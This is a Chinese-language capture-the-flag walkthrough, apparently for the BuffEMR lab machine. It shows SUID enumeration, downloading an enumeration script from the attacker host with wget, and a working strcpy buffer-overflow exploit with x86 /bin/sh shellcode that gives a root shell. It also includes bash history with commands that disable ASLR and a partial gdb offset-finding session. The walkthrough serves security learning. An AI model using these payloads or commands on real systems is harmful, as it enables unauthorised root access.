COnGRATS !! lETs get ROOT now ....!!
成功拿到flag1
咱们查看一下用户可以访问的suid二进制程序
方法一 :find查找suid二进制程序
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
buffemr@buffemr:~$ find / -perm -4000 -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 22528 Jun 28 2019 /usr/bin/arping
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 19 2021 /usr/bin/sudo
-rwsr-xr-- 1 root dip 378600 Jul 23 2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 10232 Apr 8 2021 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 113528 Feb 2 2021 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
-rwsr-xr-x 1 root root 43088 Sep 16 2020 /snap/core18/2066/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/2066/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/2066/bin/su
-rwsr-xr-x 1 root root 26696 Sep 16 2020 /snap/core18/2066/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/2066/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/2066/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/2066/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/2066/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/2066/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 19 2021 /snap/core18/2066/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/2066/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Sep 16 2020 /snap/core18/2074/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/2074/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/2074/bin/su
-rwsr-xr-x 1 root root 26696 Sep 16 2020 /snap/core18/2074/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/2074/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/2074/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/2074/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/2074/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/2074/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 19 2021 /snap/core18/2074/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/2074/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 110792 Jul 10 2020 /snap/snapd/8542/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 111080 May 27 2021 /snap/snapd/12159/usr/lib/snapd/snap-confine
-rwsrwxr-x 1 root root 7700 Jun 23 2021 /opt/dontexecute
去https://gtfobins.github.io/查找一下
未发现可以利用的,这里有个/usr/lib/policykit-1/polkit-agent-helper-1
还有一个/opt/dontexecute
方法二:suid3num.py使用
suid3num.py原脚本链接
本地监听
python -m http.server 8888
靶机下载
wget http://192.168.11.130:8888/suid3num.py
运行一下
buffemr@buffemr:~$ wget http://192.168.11.130:8888/suid3num.py
--2024-04-04 06:02:47-- http://192.168.11.130:8888/suid3num.py
Connecting to 192.168.11.130:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16632 (16K) [text/x-python]
Saving to: ‘suid3num.py’
suid3num.py 100%[==============================================================================================================>] 16.24K --.-KB/s in 0s
2024-04-04 06:02:47 (64.9 MB/s) - ‘suid3num.py’ saved [16632/16632]
buffemr@buffemr:~$ python3 suid3num.py
___ _ _ _ ___ _____ _ _ _ __ __
/ __| | | / | \ |__ / \| | | | | \/ |
\__ \ |_| | | |) | |_ \ .` | |_| | |\/| |
|___/\___/|_|___/ |___/_|\_|\___/|_| |_| twitter@syed__umar
[#] Finding/Listing all SUID Binaries ..
------------------------------
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/sudo
/usr/sbin/pppd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/mount
/bin/su
/bin/ping
/bin/umount
/snap/core18/2066/bin/mount
/snap/core18/2066/bin/ping
/snap/core18/2066/bin/su
/snap/core18/2066/bin/umount
/snap/core18/2066/usr/bin/chfn
/snap/core18/2066/usr/bin/chsh
/snap/core18/2066/usr/bin/gpasswd
/snap/core18/2066/usr/bin/newgrp
/snap/core18/2066/usr/bin/passwd
/snap/core18/2066/usr/bin/sudo
/snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2066/usr/lib/openssh/ssh-keysign
/snap/core18/2074/bin/mount
/snap/core18/2074/bin/ping
/snap/core18/2074/bin/su
/snap/core18/2074/bin/umount
/snap/core18/2074/usr/bin/chfn
/snap/core18/2074/usr/bin/chsh
/snap/core18/2074/usr/bin/gpasswd
/snap/core18/2074/usr/bin/newgrp
/snap/core18/2074/usr/bin/passwd
/snap/core18/2074/usr/bin/sudo
/snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2074/usr/lib/openssh/ssh-keysign
/snap/snapd/8542/usr/lib/snapd/snap-confine
/snap/snapd/12159/usr/lib/snapd/snap-confine
/opt/dontexecute
------------------------------
[!] Default Binaries (Don't bother)
------------------------------
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/sudo
/usr/sbin/pppd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/mount
/bin/su
/bin/ping
/bin/umount
/snap/core18/2066/bin/mount
/snap/core18/2066/bin/ping
/snap/core18/2066/bin/su
/snap/core18/2066/bin/umount
/snap/core18/2066/usr/bin/chfn
/snap/core18/2066/usr/bin/chsh
/snap/core18/2066/usr/bin/gpasswd
/snap/core18/2066/usr/bin/newgrp
/snap/core18/2066/usr/bin/passwd
/snap/core18/2066/usr/bin/sudo
/snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2066/usr/lib/openssh/ssh-keysign
/snap/core18/2074/bin/mount
/snap/core18/2074/bin/ping
/snap/core18/2074/bin/su
/snap/core18/2074/bin/umount
/snap/core18/2074/usr/bin/chfn
/snap/core18/2074/usr/bin/chsh
/snap/core18/2074/usr/bin/gpasswd
/snap/core18/2074/usr/bin/newgrp
/snap/core18/2074/usr/bin/passwd
/snap/core18/2074/usr/bin/sudo
/snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2074/usr/lib/openssh/ssh-keysign
/snap/snapd/8542/usr/lib/snapd/snap-confine
/snap/snapd/12159/usr/lib/snapd/snap-confine
------------------------------
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/opt/dontexecute
------------------------------
[#] SUID Binaries found in GTFO bins..
------------------------------
[!] None :(
------------------------------
2.4.3 缓冲区溢出提权
查看一下history
buffemr@buffemr:~$ history
1 sudo su
2 su root
3 reboot
4 mysql -u root -p
5 mysql -uroot -p
6 su root
7 mysql -u openemruser
8 mysql -u openemruser -p
9 ls
10 cd /home/
11 ls
12 cd /mnt/
13 sudo -l
14 exit
15 chmod 700 -R /home/buffemr/
16 sudo su
17 su root
18 ls
19 pwd
20 ls
21 curl https://www.danielmills.org/downloads/buffer_overflow/escalte.cpp -o nothing.cpp
22 apt install curl
23 sudo apt install curl
24 wget https://www.danielmills.org/downloads/buffer_overflow/escalte.cpp
25 ls
26 reboot
27 echo "san3ncrypt3d" | base64
28 apt install g++
29 cd /mnt/
30 exit
31 ls
32 cd Downloads/
33 ls
34 mv escalate.cpp /home/buffemr/
35 cd /home/buffemr/
36 ls
37 mv escalate.cpp nothing.cpp
38 ls
39 su root
40 ./dont_execute
41 ./dont_execute 12
42 ./dont_execute `python -c 'print
43 A
44 ./dont_execute `python -c 'print "A"*200'`
45 sudo su
46 su root
47 ls
48 g++ nothing.cpp -o nothing -m32 -fno-stack-protector -z execstack
49 nano nothing.cpp
50 g++ nothing.cpp -o nothing -m32 -fno-stack-protector -z execstack
51 su root
52 cd /home/buffemr/
53 ls
54 cat user_flag.txt
55 ls
56 ./dont_execute 400
57 ./dont_execute 5000
58 ./dont_execute `python -c 'print "A"*400'`
59 ./dont_execute `python -c 'print "A"*200'`
60 ./dont_execute `python -c 'print "A"*201'`
61 ./dont_execute `python -c 'print "A"*208'`
62 su root
63 g++ dontexecute.cpp -o dontexecute -m32 -fno-stack-protector -z execstack
64 ls
65 rm dontexecute.cpp
66 su root
67 ls
68 ls -la
69 find -name don*
70 find -name *don*
71 locate dont*
72 locate *dont*
73 locate *dont* /opt/
74 clear
75 ls
76 cd Downloads/
77 ls
78 mv escalate.cpp dontexecute.cpp
79 mv dontexecute.cpp /opt/
80 cd /opt/
81 ls
82 nano dontexecute.cpp
83 ls
84 rm dont_execute
85 ;s
86 ls
87 g++ dontexecute.cpp -o dontexecute -m32 -fno-stack-protector -z execstack
88 su root
89 g++ escalate.cpp -o escalate -m32 -fno-stack-protector -z execstack
90 g++ dontexecute.cpp -o dontexecute -m32 -fno-stack-protector -z execstack
91 ls
92 su root
93 nano dontexecute.cpp
94 ls
95 g++ dontexecute.cpp -o dontexecute -m32 -fno-stack-protector -z execstack
96 ls
97 su root
98 ls
99 gdb dontexecute
100 ls -la
101 ./dontexecute $(python -c "print '\x90' * 457 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\xc0\xd5\xff\xff'")
102 ls
103 sudo ./dontexecute $(python -c "print '\x90' * 457 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\xc0\xd5\xff\xff'")
104 ./dontexecute $(python -c "print '\x90' * 457 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\xc0\xd5\xff\xff'")
105 cd /opt/
106 ls
107 ls -la
108 ./dontexecute
109 ./dontexecute 1233
110 strings dontexecute
111 ./dontexecute `python -c 'print "A" * 100'`
112 ./dontexecute `python -c 'print "A" * 150'`
113 ./dontexecute `python -c 'print "A" * 200'`
114 ./dontexecute `python -c 'print "A" * 250'`
115 ./dontexecute `python -c 'print "A" * 225'`
116 ./dontexecute `python -c 'print "A" * 210'`
117 ./dontexecute `python -c 'print "A" * 205'`
118 ./dontexecute `python -c 'print "A" * 207'`
119 ./dontexecute `python -c 'print "A" * 208'`
120 gdb -q --args ./dontexecute `python -c 'print "A" * 208'`
121 gdb -q --args ./dontexecute `python -c 'print "A" * 212'`
122 gdb -q --args ./dontexecute `python -c 'print "A" * 216'`
123 gdb -q --args ./dontexecute `python -c 'print "A" * 215'`
124 gdb -q --args ./dontexecute `python -c 'print "A" * 215 + "BCDE"'`
125 gdb -q --args ./dontexecute `python -c 'print "A" * 212 + "BCDE"'`
126 python -c "print len('\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'"
127 python -c "print len('\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80')"
128 python
129 ./dontexecute `python -c ‘print “\x90”*157 + “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80” + “\x41\x41\x41\x41”’`
130 ./dontexecute `python -c ‘print “\x90”*157 + “\x31-c 'print "\x90"*157 + "\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80” + “\x41\x41\x41\x41”’`
131 ./dontexecute `python -c ‘rint “\x90”*157 + “\x31-c 'print "\x90"*157 + "\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80” + “\x41\x41\x41\x41”’`
132 gdb -q --args ./dontexecute `python -c ‘rint “\x90”*157 + “\x31-c 'print "\x90"*157 + "\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80” + “\x41\x41\x41\x41”’`
133 gdb dontexecute
134 ./dontexecute
135 gdb dontexecute
136 ls
137 su root
138 ls
139 gdb danger
140 ls
141 ./danger
142 ./danger 11
143 ./danger 122
144 ./danger
145 ./danger hello
146 gdb danger
147 ls
148 rm danger
149 ls
150 nano danger.cpp
151 wget https://www.danielmills.org/downloads/buffer_overflow/escalate.cpp
152 s
153 ls
154 mv escalate.cpp dontexecute.cpp
155 su root
156 gcc danger.c -o danger -fno-stack-protector -g -z execstack
157 ls
158 su root
159 cd /opt/
160 ls
161 ls -la
162 ./dontexecute $(python -c "print '\x90' * 457 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\xc0\xd5\xff\xff'")
163 gdb dontexecute
164 ./dontexecute $(python -c "print '\x90' * 457 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\xf0\xd6\xff\xff'")
165 ./dontexecute `python -c 'print "\x90" * 457 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\xf0\xd6\xff\xff"'`
166 gdb dontexecute
167 https://github.com/san3ncrypt3d/shell-code-priv-esc
168 ./dontexecute $(python -c 'print "\x90" * 459 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\xa0\xd6\xff\xff"')
169 exit
170 cd /opt/
171 ./dontexecute $(python -c 'print "\x90" * 459 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\xa0\xd6\xff\xff"')
172 cd /opt/
173 ls
174 rm dontexecute.cpp
175 ls
176 ls -la
177 cat /proc/sys/kernel/randomize_va_space
178 echo "0" > /proc/sys/kernel/randomize_va_space
179 sudo echo "0" > /proc/sys/kernel/randomize_va_space
180 su root
181 cat /proc/sys/kernel/randomize_va_space
182 nano /etc/sysctl.d/01-disable-aslr.conf
183 sudo nano /etc/sysctl.d/01-disable-aslr.conf
184 su root
185 cat /proc/sys/kernel/randomize_va_space
这里可以发现历史命令中在使用dontexecute做提权测试,直接可以用命令操作一下
buffemr@buffemr:~$ cd /opt/
buffemr@buffemr:/opt$ ./dontexecute $(python -c 'print "\x90" * 459 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\xa0\xd6\xff\xff"')
# id
uid=0(root) gid=1000(buffemr) groups=1000(buffemr),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
# cd /root
# ls
Root_flag.txt snap
# cat Root_flag.txt
________ __ __ ____ _____ ___
`MMMMMMMb. 69MM69MM 6MMMMb 69M`MM `MM
MM `Mb 6M' 6M' ` 8P Y8 6M' `MM MM
MM MM ___ ___ _MM__MM______ ___ __ 6M Mb ____ ___ ____ ___ __ _MM__ MM _____ ____ _ ___ ____ ____MM
MM .M9 `MM MM MMMMMMMM6MMMMb `MM 6MM MM MM `MM( )M' 6MMMMb `MM 6MM MMMMM MM 6MMMMMb `MM( ,M. )M' 6MMMMb 6MMMMMM
MMMMMMM( MM MM MM MM6M' `Mb MM69 " MM MM `Mb d' 6M' `Mb MM69 " MM MM 6M' `Mb `Mb dMb d' 6M' `Mb 6M' `MM
MM `Mb MM MM MM MMMM MM MM' MM MM YM. ,P MM MM MM' MM MM MM MM YM. ,PYM. ,P MM MM MM MM
MM MM MM MM MM MMMMMMMMMM MM MM MM MM M MMMMMMMM MM MM MM MM MM `Mb d'`Mb d' MMMMMMMM MM MM
MM MM MM MM MM MMMM MM YM M9 `Mbd' MM MM MM MM MM MM YM,P YM,P MM MM MM
MM .M9 YM. MM MM MMYM d9 MM 8b d8 YMP YM d9 MM MM MM YM. ,M9 `MM' `MM' YM d9 YM. ,MM
_MMMMMMM9' YMMM9MM__MM__MM_YMMMM9 _MM_ YMMMM9 M YMMMM9 _MM_ _MM_ _MM_ YMMMMM9 YP YP YMMMM9 YMMMMMM_
________ ___ 8 8
`MMMMMMMb. `MM (M) (M)
MM `Mb / MM (M) (M)
MM MM _____ _____ /M ____ ____MM (M) (M)
MM MM 6MMMMMb 6MMMMMb /MMMMM 6MMMMb 6MMMMMM M M
MM .M9 6M' `Mb 6M' `Mb MM 6M' `Mb 6M' `MM M M
MMMMMMM9' MM MM MM MM MM MM MM MM MM M M
MM \M\ MM MM MM MM MM MMMMMMMM MM MM 8 8
MM \M\ MM MM MM MM MM MM MM MM
MM \M\ YM. ,M9 YM. ,M9 YM. ,YM d9 YM. ,MM 68b 68b
_MM_ \M\_YMMMMM9 YMMMMM9 YMMM9 YMMMM9 YMMMMMM_ Y89 Y89
COngratulations !!! Tweet me at @san3ncrypt3d !
成功提权至root权限,并拿到flag2
2.4.4 strcpy溢出原理学习
上边那个只是为了拿到flag,下边咱们学习一下缓冲区溢出提权
buffemr@buffemr:~$ strings /opt/dontexecute
/lib/ld-linux.so.2
libstdc++.so.6
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
_ZSt4cout
_ZNSt8ios_base4InitD1Ev
_ZNSt8ios_base4InitC1Ev
libc.so.6
_IO_stdin_used
strcpy
__cxa_atexit
__cxa_finalize
__libc_start_main
GLIBCXX_3.4
GLIBC_2.0
GLIBC_2.1.3
UWVS
[^_]
Usage: ./dontexecute argument
;*2$"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7283
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
dontexecute.cpp
_ZStL19piecewise_construct
_ZStL8__ioinit
_Z41__static_initialization_and_destruction_0ii
_GLOBAL__sub_I__Z10vulnerablePc
__FRAME_END__
__GNU_EH_FRAME_HDR
_DYNAMIC
__init_array_end
__init_array_start
_GLOBAL_OFFSET_TABLE_
__cxa_finalize@@GLIBC_2.1.3
__x86.get_pc_thunk.ax
_edata
_IO_stdin_used
_fp_hw
main
__dso_handle
__cxa_atexit@@GLIBC_2.1.3
__x86.get_pc_thunk.bx
__libc_start_main@@GLIBC_2.0
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@@GLIBCXX_3.4
__TMC_END__
_ZSt4cout@@GLIBCXX_3.4
__data_start
__x86.get_pc_thunk.dx
__bss_start
_ZNSt8ios_base4InitC1Ev@@GLIBCXX_3.4
__libc_csu_init
_ITM_deregisterTMCloneTable
__libc_csu_fini
__gmon_start__
strcpy@@GLIBC_2.0
_ITM_registerTMCloneTable
_ZNSt8ios_base4InitD1Ev@@GLIBCXX_3.4
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
可以发现dontexecute使用了strcpy函数。
strcpy溢出原理
strcpy(a,b),如果将长度较大的值 b 赋值给 较短的值 a(b>a),那么strcpy之后,b多出来将一部分将会覆盖原来的内存单元。当溢出的值刚好覆盖了 函数结束后 ret 返回的地址时,那么函数 ret后将会执行 溢出的值。
所以这里咱们可以尝试利用缓冲区溢出来运行shell代码获取root权限
这里因为需要尝试利用缓冲区溢出,得先看看该机器是否有ASLR保护
buffemr@buffemr:/opt$ cat /proc/sys/kernel/randomize_va_space
0
发现该机器ASLR保护是关的
如何关闭可以参考改文章:linux关闭ASLR
用 metasploit 中的 pattern_create.rb 生成数量 1000 的字符串用来计算偏移量
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# cd /usr/share/metasploit-framework/tools/exploit
┌──(root㉿MYsec)-[/usr/share/metasploit-framework/tools/exploit]
└─# ./pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
将生成的字符串用命令r在 gdb 中运行
buffemr@buffemr:/opt$ gdb -q dontexecute
Reading symbols from dontexecute...(no debugging symbols found)...done.
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba